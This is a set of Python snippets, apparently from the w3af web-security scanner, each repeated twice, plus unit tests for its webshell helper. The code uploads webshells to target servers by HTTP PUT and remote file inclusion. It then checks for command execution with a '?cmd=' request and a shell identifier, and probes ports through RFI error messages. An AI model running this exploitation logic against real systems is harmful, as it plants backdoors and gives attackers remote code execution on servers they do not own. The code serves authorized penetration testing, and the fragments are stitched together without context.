def _create_file(self, extension): """ Create a file with a webshell as content. :return: Name of the file that was created. """ # Get content file_content, real_extension = shell_handler.get_webshells(extension, force_extension=True)[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def _create_file(self, extension): """ Create a file with a webshell as content. :return: Name of the file that was created. """ # Get content file_content, real_extension = shell_handler.get_webshells( extension, force_extension=True)[0] if extension == '': extension = real_extension # Open target temp_dir = get_temp_dir() low_level_fd, path_name = tempfile.mkstemp(prefix='w3af_', suffix='.' + extension, dir=temp_dir) file_handler = os.fdopen(low_level_fd, "w+b") # Write content to target file_handler.write(file_content) file_handler.close() path, file_name = os.path.split(path_name) return path, file_name
def test_get_web_shell_code_extension_force(self): shells = get_webshells('php', True) # Only one returned since we're forcing the extension self.assertEqual(len(shells), 1) php_shell_code, lang = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def test_get_web_shell_code_extension_force(self): shells = get_webshells('php', True) # Only one returned since we're forcing the extension self.assertEqual(len(shells), 1) php_shell_code, lang = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def test_get_web_shell_extension(self): shells = get_webshells('php') self.assertEqual(len(shells), 6) # The first one is PHP since we asked for it when we passed PHP as # parameter php_shell_code, lang = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def test_get_web_shell_extension(self): shells = get_webshells('php') self.assertEqual(len(shells), 6) # The first one is PHP since we asked for it when we passed PHP as # parameter php_shell_code, lang = shells[0] self.assertEqual(lang, 'php') self.assertIn('echo ', php_shell_code)
def _get_web_shells(self, extension): """ :yield: Tuples with file_content and file_name for web shells. """ for shell_str, orig_extension in shell_handler.get_webshells(extension): # If the webshell was webshell.php this will return a file_name # containing kgiwjxh.php (8 rand and the extension) file_name = '%s.%s' % (rand_alpha(8), orig_extension) yield shell_str, file_name # Now we want to return the webshell content <?php ... ?> but in a # file with the extension that the upload URL had. This makes our # chances of getting access a little greater file_name = '%s.%s' % (rand_alpha(8), extension) yield shell_str, file_name
def _get_web_shells(self, extension): """ :yield: Tuples with file_content and file_name for web shells. """ for shell_str, orig_extension in shell_handler.get_webshells( extension): # If the webshell was webshell.php this will return a file_name # containing kgiwjxh.php (8 rand and the extension) file_name = '%s.%s' % (rand_alpha(8), orig_extension) yield shell_str, file_name # Now we want to return the webshell content <?php ... ?> but in a # file with the extension that the upload URL had. This makes our # chances of getting access a little greater file_name = '%s.%s' % (rand_alpha(8), extension) yield shell_str, file_name
def _verify_vuln(self, vuln_obj): """ This command verifies a vuln. This is really hard work! :P :return : True if vuln can be exploited. """ # Create the shell filename = rand_alpha(7) extension = vuln_obj.get_url().get_extension() # I get a list of tuples with file_content and extension to use shell_list = shell_handler.get_webshells(extension) for file_content, real_extension in shell_list: if extension == '': extension = real_extension om.out.debug('Uploading shell with extension: "%s".' % extension) # Upload the shell fname = '%s.%s' % (filename, extension) url_to_upload = vuln_obj.get_url().url_join(fname) om.out.debug('Uploading file %s using PUT method.' % url_to_upload) self._uri_opener.PUT(url_to_upload, data=file_content) # Verify if I can execute commands # All w3af shells, when invoked with a blank command, return a # specific value in the response: # shell_handler.SHELL_IDENTIFIER exploit_url = URL(url_to_upload + '?cmd=') response = self._uri_opener.GET(exploit_url) if shell_handler.SHELL_IDENTIFIER in response.get_body(): msg = ( 'The uploaded shell returned the SHELL_IDENTIFIER, which' ' verifies that the file was uploaded and is being' ' executed.') om.out.debug(msg) self._exploit_url = exploit_url return True else: msg = ('The uploaded shell with extension: "%s" did NOT return' ' the SHELL_IDENTIFIER, which means that the file was' ' not uploaded to the remote server or the code is not' ' being run. The returned body was: "%s".') om.out.debug(msg % (extension, response.get_body())) extension = ''
def _verify_vuln(self, vuln_obj): """ This command verifies a vuln. This is really hard work! :P :return : True if vuln can be exploited. """ # Create the shell filename = rand_alpha(7) extension = vuln_obj.get_url().get_extension() # I get a list of tuples with file_content and extension to use shell_list = shell_handler.get_webshells(extension) for file_content, real_extension in shell_list: if extension == '': extension = real_extension om.out.debug('Uploading shell with extension: "%s".' % extension) # Upload the shell fname = '%s.%s' % (filename, extension) url_to_upload = vuln_obj.get_url().url_join(fname) om.out.debug( 'Uploading file %s using PUT method.' % url_to_upload) self._uri_opener.PUT(url_to_upload, data=file_content) # Verify if I can execute commands # All w3af shells, when invoked with a blank command, return a # specific value in the response: # shell_handler.SHELL_IDENTIFIER exploit_url = URL(url_to_upload + '?cmd=') response = self._uri_opener.GET(exploit_url) if shell_handler.SHELL_IDENTIFIER in response.get_body(): msg = 'The uploaded shell returned the SHELL_IDENTIFIER, which'\ ' verifies that the file was uploaded and is being' \ ' executed.' om.out.debug(msg) self._exploit_url = exploit_url return True else: msg = 'The uploaded shell with extension: "%s" did NOT return'\ ' the SHELL_IDENTIFIER, which means that the file was'\ ' not uploaded to the remote server or the code is not'\ ' being run. The returned body was: "%s".' om.out.debug(msg % (extension, response.get_body())) extension = ''
def test_with_kb_data(self): kb.kb.raw_write('server_header', 'powered_by_string', ['ASP foo bar',]) shells = get_webshells('') # TODO: The shells list has duplicates, fix in the future. Not really a # big issue since it would translate into 1 more HTTP request and # only in the cases where the user is exploiting something self.assertEqual(len(shells), 7) # The first one is ASP since we're scanning (according to the KB) an # ASP site asp_shell_code, lang = shells[0] self.assertEqual(lang, 'asp') self.assertIn('WSCRIPT.SHELL', asp_shell_code) kb.kb.cleanup()
def test_with_kb_data(self): kb.kb.raw_write('server_header', 'powered_by_string', [ 'ASP foo bar', ]) shells = get_webshells('') # TODO: The shells list has duplicates, fix in the future. Not really a # big issue since it would translate into 1 more HTTP request and # only in the cases where the user is exploiting something self.assertEqual(len(shells), 7) # The first one is ASP since we're scanning (according to the KB) an # ASP site asp_shell_code, lang = shells[0] self.assertEqual(lang, 'asp') self.assertIn('WSCRIPT.SHELL', asp_shell_code) kb.kb.cleanup()
def _verify_vuln(self, vuln): """ This command verifies a vuln. This is really hard work! :return : True if vuln can be exploited. """ extension = vuln.get_url().get_extension() # I get a list of tuples with file_content and extension to use shell_list = shell_handler.get_webshells(extension) for file_content, real_extension in shell_list: # # This for loop aims to exploit the RFI vulnerability and get remote # code execution. # if extension == '': extension = real_extension url_to_include = self._gen_url_to_include(file_content, extension) # Prepare for exploitation... mutant = vuln.get_mutant() mutant = mutant.copy() mutant.set_token_value(url_to_include) try: http_res = self._uri_opener.send_mutant(mutant) except: continue else: if shell_handler.SHELL_IDENTIFIER in http_res.body: self._exploit_mutant = mutant return SUCCESS_COMPLETE else: # Remove the file from the local webserver webroot self._rm_file(url_to_include) else: # # We get here when it was impossible to create a RFI shell, but we # still might be able to do some interesting stuff through error # messages shown by the web application # mutant = vuln.get_mutant() mutant = mutant.copy() # A port that should "always" be closed mutant.set_token_value('http://localhost:92/') try: http_response = self._uri_opener.send_mutant(mutant) except: return False else: rfi_errors = [ 'php_network_getaddresses: getaddrinfo', 'failed to open stream: Connection refused in' ] for error in rfi_errors: if error in http_response.get_body(): return SUCCESS_OPEN_PORT return NO_SUCCESS
def test_get_web_shell_code_invalid_extension(self): shells = get_webshells('123456') # All returned when invalid extension self.assertEqual(len(shells), 6)
def test_get_web_shell_code_invalid_extension(self): shells = get_webshells('123456') # All returned when invalid extension self.assertEqual(len(shells), 6)
def _verify_vuln(self, vuln): """ This command verifies a vuln. This is really hard work! :return : True if vuln can be exploited. """ extension = vuln.get_url().get_extension() # I get a list of tuples with file_content and extension to use shell_list = shell_handler.get_webshells(extension) for file_content, real_extension in shell_list: # # This for loop aims to exploit the RFI vulnerability and get remote # code execution. # if extension == '': extension = real_extension url_to_include = self._gen_url_to_include(file_content, extension) # Prepare for exploitation... mutant = vuln.get_mutant() mutant = mutant.copy() mutant.set_token_value(url_to_include) try: http_res = self._uri_opener.send_mutant(mutant) except: continue else: if shell_handler.SHELL_IDENTIFIER in http_res.body: self._exploit_mutant = mutant return SUCCESS_COMPLETE else: # Remove the file from the local webserver webroot self._rm_file(url_to_include) else: # # We get here when it was impossible to create a RFI shell, but we # still might be able to do some interesting stuff through error # messages shown by the web application # mutant = vuln.get_mutant() mutant = mutant.copy() # A port that should "always" be closed mutant.set_token_value('http://localhost:92/') try: http_response = self._uri_opener.send_mutant(mutant) except: return False else: rfi_errors = ['php_network_getaddresses: getaddrinfo', 'failed to open stream: Connection refused in'] for error in rfi_errors: if error in http_response.get_body(): return SUCCESS_OPEN_PORT return NO_SUCCESS